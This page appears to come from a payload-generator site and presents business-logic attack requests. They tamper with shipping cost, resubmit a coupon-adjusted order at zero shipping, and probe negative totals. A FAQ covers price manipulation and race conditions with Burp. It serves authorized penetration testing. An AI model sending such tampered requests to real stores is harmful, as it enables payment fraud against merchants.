Skip to content
Payload Playground
$loading...
# ── Shipping Cost Manipulation ────────────────────────────────────────
# Goal: bypass shipping cost by tampering hidden fields

POST /checkout/shipping HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

shipping_method=standard&shipping_cost=0&order_total=100.00&item_id=ITEM-123

# Method 2: Add free shipping coupon after total calculation
# Step 1: Calculate total (100.00 + shipping cost)
POST /api/cart/calculate
{"item_id": "ITEM-123", "quantity": 1}
# Response: {"total": 100.00, "shipping": 9.99, "order_id": "ord_123"}

# Step 2: Apply free shipping coupon to calculated order
POST /api/cart/coupon
{"coupon_code": "FREESHIP", "order_id": "ord_123"}

# Step 3: Re-submit with shipping_cost=0 from modified response
POST /checkout/confirm
{"order_id": "ord_123", "shipping_cost": 0, "total": 100.00}

# Also test: negative shipping cost to reduce order total below zero
For authorized penetration testing and security research only. Only test systems you own or have explicit written permission to test.

Frequently Asked Questions

What is a business logic vulnerability?+

It is a flaw in how an application enforces its own rules rather than a code injection bug, letting an attacker abuse legitimate features in unintended ways. Examples include manipulating a price, skipping a payment step, or replaying a request, and the Business Logic generator builds payloads to probe each of these flows.

How do I test for price manipulation or workflow bypass with this generator?+

It produces tampered requests that change a quantity to a negative number, swap a currency, or set a price field to zero, plus parameters that jump straight to a confirmation step. You replay them in Burp Repeater against an authorized target to see if server-side validation is missing.

How do I exploit a race condition in a web application?+

Race conditions appear when two requests hit a check-then-act flow at the same time, such as redeeming one coupon twice or over-withdrawing a balance. The generator outputs concurrent-request payloads suited to Burp's single-packet attack or Turbo Intruder, firing dozens of requests in the same window to win the race before state updates.

Is the Business Logic generator free to use?+

Yes. The Business Logic generator is free and runs 100% in your browser, so the endpoints, parameters, and values you enter are never transmitted to any server. Only test applications you have written permission to assess.

Business Logic Vulnerability Generator — Payment Fraud, Workflow Bypass & Race Conditions | Payload Playground